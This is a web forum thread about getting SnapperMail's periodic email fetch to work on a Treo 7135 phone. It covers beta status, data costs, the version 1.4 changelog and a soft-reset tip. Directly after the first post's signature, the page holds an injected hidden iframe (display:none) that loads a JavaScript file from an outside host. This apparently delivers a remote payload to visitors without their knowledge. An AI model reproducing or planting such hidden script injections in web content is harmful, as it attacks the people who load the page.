+ Reply to Thread
Page 1 of 3 1 2 3 LastLast

Snappermail Periodic Fetch on 7135

Has anyone managed to get the Snappermail periodic send/fetch feature to work with a 7135? I've tried with the cover open/closed. I have an Alltel qnc connection.

NM geek<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Re: Snappermail Periodic Fetch on 7135

Originally posted by NMgeek
    Has anyone managed to get the Snappermail periodic send/fetch feature to work with a 7135? I've tried with the cover open/closed. I have an Alltel qnc connection.

NM geek
    I don't think it works yet. This is still a beta product. The Kiwi or Aussie (aren't they the same?) that's developing it told me they'll have a real release in 4 weeks.

Ed note: That didn't stop those enterprising guys from the bottom half of the world from taking my Yankee dollars in advance, though!

I don't have a 7135 yet; I'm stuck with Sprint b/c of pricing, but don't bash SnapperMail. This product has come a long way in a short time; and has a pretty great featureset for such a young product.

As to paying for this early release, many other software programs are "released" when less developed than this one, and with a higher price tag.

If you "paid in advance", keep in mind you got a product to use now and are able to contribute to the feedback process. (Beta Forum) Your $$ are going to help the developers spend the time and resources (which take $$) to make this a better product, faster.

Hang in there.

BTW, I have no business ties to Snappermail, I'm just a customer who has been involved with many other Betas, and have been impressed with the progress and attitutde of these developers, no matter where they're from.

Andy :alieneyes

The Kiwi or Aussie (aren't they the same?)
    Kiwi = New Zealander
    Aussie = Australian

I'm using the Snappermail beta. The periodic fetch is working...periodically. I have it set to fetch every half hour. Sometimes it does, sometimes it doesn't. It sure is nice though to hear the chirp of the mail arrived alarm.

What is the shortest amount of time you can set it for between fetches?
    ~'kito
    pdaPhoneHome Moderator

beta program

how do you get the beta - would like to try it out

~'kito
    pdaPhoneHome Moderator

Originally posted by richard
    Kiwi = New Zealander
    Aussie = Australian
    duh - can't you take a joke, dummy?

I read the following official quote from SnapperMail about their newest version...

"The star feature for 1.4 is Periodic Mail fetching, a much request feature from our customers. With periodic fetching enabled, your handheld will automatically wake-up and fetch / send mail at
    configurable intervals. Just so it doesn't get in your way, we've designed it to activate only when your device is turned off."

I'm confused by this. It says that it won't fetch (a.k.a. push) email unless your PDA is turned off. I assume that our 7135 is considered "off" when the clamshell is closed?

Does this sound like a problem for our device? Or does it just mean that we need to keep the clam closed if we want fetching.

I got the quote from an email sent to me by SnapperMail/Wil Lau, I didn't see this listed anywhere on their website.

It also said that fetching could be configured to a specific minute. So does that mean that if you wanted to, you couls have it check every minute? Not that you want to taht often.

So any of you 7135 owners currently fetching with 7135? Are the above two points correct?

Thanks,
    ~'kito
    pdaPhoneHome Moderator

Here is the entire (very informative) email...

"This is just a quick note to let you know we've released a newer version of SnapperMail. This update includes a huge number of incremental improvements and some new features. The star
    feature for 1.4 is Periodic Mail fetching, a much request feature from our customers. With periodic fetching enabled, your handheld will automatically wake-up and fetch / send mail at
    configurable intervals. Just so it doesn't get in your way, we've designed it to activate only when your device is turned off.

WHAT'S NEW:
    Here's what's new in v1.4.0b:

- NEW: Periodic Mail Fetching
    + Periodic intervals to the nearest minute
    + Configurable active time of day and days of week
    + Configurable automatic disconnect
    + Configurable alerts
    + Attention Manager supported in OS 4 or above
    - NEW: Manual Fetch options
    + Allow/disallow one button fetch
    + Configurable automatic disconnect
    + Configurable alerts
    - NEW: Connection Log, displays a history of past connections to the mail servers
    - NEW: Better Treo Jog Rocker Support.
    + Jog Up/Down changes msg composer fields
    + Page Up/Down work independently from Jog Rocker
    + Jog button activates email lookup in composer's To: Cc: Bcc: fields
    - NEW: Better Treo Keyboard support
    + No need to hit the command stroke prior to a shortcut
    + [enter] opens messages
    + [backspace] exits message
    + [Option+Pageup/Pagedown] in msg reader jumps to previous/next msg
    + [backspace] dismisses all alert forms
    + more shortcut commands added
    - NEW: User can select which application to open an attachment with if more than one is available ("Open with..." command)
    - NEW: Attachment "Properties" Inspector, lets you rename attachment files
    - Now fetches the latest X number of messages on the server instead of fetching X new messages on each fetch operation
    - Message Reader now uses "1 of 10" style text in the titlebar
    - Now silently logs sending problems and continues with on with the Send/Fetch process
    - Now checks for illegal characters in the account settings
    - Now ignores SMTP user/pass settings, if server does not support SMTP AUTH.
    - Short header view inside composer now ommits Cc: field and can be switched to even if the extended fields are populated
    - Signature form now has a scrollbar
    - Fixed. Backup databases settings stays on in v1.3.1
    - Fixed. Day of the week one day out when composing message headers

We're nearing the end of the official "beta" phase and hope to be in full release early in the New Year. This will include manuals and a final round of bug-fixes. After this, we'll still ship improvements, but under a "full release" banner.

If you want to report any problems or submit feedback please post them to our beta forum below:
    http://groups.yahoo.com/group/SnapperMailPublicBeta/
    "
    ~'kito
    pdaPhoneHome Moderator

Silly question??

does snappermail use your airtime minutes when it fetches your mail??

I'm sure it does unless you have unlimited Express Network.
    That's why I said that a fetch every minute would be great, but to expensive... although it would be great if you could specify that it would fetch every 15 minutes or half hour Mon.-Fri. during the day and then every minute during weekdays after 9pm and all weekend long (for those of us with free nights & weekends)!
    I think I should look into that. It would be very useful.
    ~'kito
    pdaPhoneHome Moderator

Administrator
    it will use either MBs or minutes whenever it polls your email servers...

Originally posted by marctronixx
    it will use either MBs or minutes whenever it polls your email servers...
    Yeah, but if you compare it to any push service like Blackberry, the Express Network unlimited package at $99/mo. is well worth it esp. with all the other web capabilities plus there's no need for WAP or SMS.

Administrator
    of course! even though you have unlimited MB's you still use them to 'fetch' you mail.. thats the point i was making..

Instead of eating up minutes to check for emails that might not be there, I set up a filter to forward messages to my phone (free). I only get 160 characters, but I know it is time to use minutes and check email!

I too have an SMS alert sent to my phone when I get email, but I would rather just have the actual full length email appear in my phone than only the first sentence and then have to retrieve it manually. I love the idea of push/fetch.
    ~'kito
    pdaPhoneHome Moderator

Re: Snappermail Periodic Fetch on 7135

Originally posted by NMgeek
    Has anyone managed to get the Snappermail periodic send/fetch feature to work with a 7135? I've tried with the cover open/closed. I have an Alltel qnc connection.NM geek
    I LOVE snappermail. I have emailed my phone jpeg photos and then unzipped them and saved them on my phone for future viewing, etc.

I also LOVE the Periodic (automatic) email fetching. It does work great. This weekend I had it set to automatically fetch email every 15 minutes (though it can even go down to every one minute!), because I have free unlimited calls on evenings and weekends. It worked every 15 minutes. I did notice though that it sometimes does it a few minutes past the set mark.

I believe that you have to have your 7135 closed for it to fetch, but most of ours are closed most the time anyway. While it was closed, I could watch the clock in the external LCD and then at the right time the LCD would light up and I would see the words, "Data Call...". Incidentally, once it begins this call, you can open the phone and watch it contact the mothership and download mail if there is any.

By the way, an important tip... after you set up SnapperMail to do periodic (automatic) fetching, you then have to do an initial soft reset for it to be able to do it. I found this in SM's FAQ on their website. So if you set it, but it hasn't worked for you, it is probably because you haven't done a soft reset yet.

Since the week is about to start (normal minute charges) I had better change my fetch frequency right now.

I hope you all give it a try.
    ~'kito
    pdaPhoneHome Moderator

I love SnapperMail too but it's lack of HTML support makes it pretty unusable to me. There is often so much formatting that you can't find the actual email text. The developer says this will be fixed in v. 1.6 due in six weeks.